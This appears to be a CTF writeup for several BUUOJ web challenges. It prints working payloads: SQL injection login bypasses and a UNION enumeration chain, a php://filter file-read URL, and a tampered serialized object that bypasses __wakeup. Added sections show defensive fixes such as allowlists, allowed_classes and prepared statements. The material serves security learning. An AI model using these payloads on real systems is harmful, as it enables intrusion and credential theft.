EasySQL

Tried a space, or, ' and so on and found none of them were filtered, then tried the universal password 1' or '1... and the flag just came out???...

Maybe the buuoj environment was set up wrong...

Had a look at other people's writeups

emmm, it really is just like that... moving on...

Havefun

Nothing on the page itself, but the page source has a comment:

$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
echo 'Syc{cat_cat_cat_cat}';
}

Entered URL/?cat=dog and... the flag came out again

Secret File

Source:

<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
// the flag is in flag.php
?>
</html>

Requesting flag directly only shows a "you can't see it" message, so read it through the php://filter wrapper instead:

secr3t.php?file=php://filter/read=convert.base64-encode/resource=./flag.php

<!DOCTYPE html>

<html>

<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>

<body style="background-color:black;"><br><br><br><br><br><br>

<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>

<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "我就在这里";
$flag = 'flag{c22446be-2016-4ec1-9a76-d3e06a6e98b3}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>

</html>

The flag is in there.
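Why the blacklist in secr3t.php misses php://filter, and what a replacement check looks like. This is an added example, not code from the challenge or from the writeup: the blacklist is copied into a function so it can be checked offline, the allowlist version and its page names (index.php, about.php) are assumptions, and the inputs and the temporary directory are constructed.

```php
<?php
// Added example, not part of the challenge or the writeup.

// 1) The blacklist from secr3t.php, lifted into a function so it can be
//    checked offline. Returns true when the input would reach include().
function blacklist_allows(string $file): bool {
    return !(strstr($file, "../") || stristr($file, "tp")
          || stristr($file, "input") || stristr($file, "data"));
}

// 2) A replacement: a fixed allowlist of page names plus a realpath check that
//    keeps the resolved file inside $baseDir. Stream wrappers (php://, data:,
//    http://) and traversal fail both tests; a file that is not on disk fails too.
function resolve_include(string $requested, string $baseDir): ?string {
    static $allowed = ['index.php', 'about.php'];   // hypothetical page names
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed test directory with one includable page.
$dir = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/index.php", "<?php echo 'index';\n");

// Constructed inputs. The blacklist was written for php://input, data: and
// http(s) (caught through "tp"), but php://filter contains none of the strings.
$inputs = [
    'index.php',
    'about.php',            // allowlisted name, but no such file on disk
    '../../etc/passwd',
    'php://input',
    'data://text/plain,hi',
    'http://example.com/x',
    'php://filter/read=convert.base64-encode/resource=./flag.php',
];
foreach ($inputs as $in) {
    printf("%-60s blacklist:%-5s allowlist:%s\n", $in,
        blacklist_allows($in) ? 'pass' : 'BLOCK',
        resolve_include($in, $dir) === null ? 'BLOCK' : 'pass');
}

unlink("$dir/index.php");
rmdir($dir);
```

The last row is the one that matters: the filter URL passes the blacklist and is refused by the allowlist. Denying by substring always leaves some wrapper or encoding uncovered; accepting only known names, resolved with realpath, does not depend on guessing what the attacker will type.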

PHP

www.zip

Key code in index.php

<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize($select);
?>

class.php

class Name{
private $username = 'nonono';
private $password = 'yesyes';

public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}

function __wakeup(){
$this->username = 'guest';
}

function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}

Construct the serialized string, then change the declared property count (the number after the class name) so that __wakeup is bypassed.

exp.php

<?php
class Name{
private $username='admin';
private $password='100';
}
$o = new Name();
var_dump(serialize($o));
var_dump(urlencode(serialize($o)));

?>
O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

Modified to:

O%3A4%3A%22Name%22%3A4%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D
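What the property-count edit actually does, and how to make it irrelevant. This is an added example, not code from the challenge or the writeup: the class mirrors class.php but its __destruct only prints the username, so the effect is visible without a flag, and the version notes refer to CVE-2016-7124 (unserialize() calling __destruct on a partially built object), which is where this trick comes from.

```php
<?php
// Added example, not part of the challenge or the writeup.
class Name {
    private $username = 'nonono';
    private $password = 'yesyes';
    function __wakeup()  { $this->username = 'guest'; }
    function __destruct() { echo "destruct: username={$this->username}\n"; }
}

$normal = serialize(new Name());
// Private properties carry the class name between NUL bytes, so "\0Name\0username"
// is 14 bytes long: that is the s:14 and the %00 in the urlencoded payload.
//   O:4:"Name":2:{s:14:"\0Name\0username";s:6:"nonono";s:14:"\0Name\0password";s:6:"yesyes";}
echo str_replace("\0", '\0', $normal), "\n";

// The writeup's edit: declare more properties than are actually supplied.
$tampered = preg_replace('/^O:4:"Name":2:/', 'O:4:"Name":3:', $normal);

echo "-- normal --\n";
$a = unserialize($normal);        // __wakeup runs and resets username
var_dump($a instanceof Name);     // bool(true)
unset($a);                        // prints "destruct: username=guest"

echo "-- tampered --\n";
$b = @unserialize($tampered);     // false on every PHP version: the declared count is not met
var_dump($b);
// PHP < 5.6.25 / < 7.0.10 (CVE-2016-7124): the half-built object is still
// destructed, and __wakeup never ran, so "destruct: username=nonono" is printed
// here. Fixed versions flag the object as already destructed, so nothing prints.

echo "-- mitigation --\n";
// Independent of the PHP version: never hydrate attacker-controlled data into
// real classes. With allowed_classes => false the object arrives as
// __PHP_Incomplete_Class, so neither __wakeup nor __destruct of Name can run.
$c = unserialize($normal, ['allowed_classes' => false]);
var_dump(get_class($c));          // string(22) "__PHP_Incomplete_Class"
```

The challenge works because __destruct, not __wakeup, is where the flag check lives: __wakeup is skipped when the property list is shorter than declared, and on unpatched PHP the destructor still fires with the attacker's values in place. If user input has to be unserialized at all, allowed_classes is the switch that removes the magic-method surface entirely.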

LoveSQL

Tested admin' or '1 and it worked; error-based injection

admin' order by 3#
-1' union select 1,2,database()#
geek
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
geekuser,l0ve1ysq1
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
id,username,password
-1' union select 1,2,group_concat(username) from l0ve1ysq1#
'cl4y,glzjin,Z4cHAr7zCr,0xC4m3l,Ayrain,Akko,fouc5,fouc5,fouc5,fouc5,fouc5,fouc5,fouc5,fouc5,leixiao,flag'
-1' union select 1,2,group_concat(password) from l0ve1ysq1#
'wo_tai_nan_le,glzjin_wants_a_girlfriend,biao_ge_dddd_hm,linux_chuang_shi_ren,a_rua_rain,yan_shi_fu_de_mao_bo_he,cl4y,di_2_kuai_fu_ji,di_3_kuai_fu_ji,di_4_kuai_fu_ji,di_5_kuai_fu_ji,di_6_kuai_fu_ji,di_7_kuai_fu_ji,di_8_kuai_fu_ji,Syc_san_da_hacker,flag{afcdcab8-ff94-4803-a558-0aa5d83284d0}'
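Both EasySQL and LoveSQL fall to the same login query shape, so one added example covers them. This is not the challenge code: the concatenated query is reconstructed from the payloads above (a quote closes the string, or/union extends it, # comments out the rest), the table and rows are constructed, and SQLite in memory stands in for MySQL so it runs offline.

```php
<?php
// Added example, not part of the writeup. PDO with an in-memory SQLite table;
// the users table and its rows are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)");
$db->exec("INSERT INTO users VALUES (1, 'admin', 'correct-horse'), (2, 'guest', 'guest')");

// Vulnerable: user input is pasted into the SQL text, so a quote in the input
// ends the string literal and the rest is parsed as SQL.
function login_concat(PDO $db, string $u, string $p): bool {
    $sql = "SELECT id FROM users WHERE username='$u' AND password='$p'";
    return $db->query($sql)->fetchColumn() !== false;
}

// Fixed: the same query as a prepared statement. The parser sees only the two
// placeholders; the input is bound afterwards as plain values.
function login_prepared(PDO $db, string $u, string $p): bool {
    $st = $db->prepare("SELECT id FROM users WHERE username=? AND password=?");
    $st->execute([$u, $p]);
    return $st->fetchColumn() !== false;
}

$attempts = [
    ['admin', 'correct-horse'],   // legitimate login
    ['admin', 'wrong'],           // must be denied by both
    ["1' or '1", "1' or '1"],     // the universal password from EasySQL
    ["admin' or '1", 'x'],        // the LoveSQL test
];
foreach ($attempts as [$u, $p]) {
    try {
        $c = login_concat($db, $u, $p) ? 'LOGIN' : 'denied';
    } catch (PDOException $e) {
        $c = 'sql error';
    }
    $q = login_prepared($db, $u, $p) ? 'LOGIN' : 'denied';
    printf("%-32s concat:%-9s prepared:%s\n", "$u / $p", $c, $q);
}
```

With the concatenated query, "admin' or '1" becomes username='admin' OR ('1' AND password='x'), which is true for the admin row, and "1' or '1" ends in OR '1', which is true for every row; the prepared statement compares the whole string against the column and denies both. The enumeration steps above (order by, union select against information_schema) are the same quote-and-extend mechanism, which is why a prepared statement closes all of them at once.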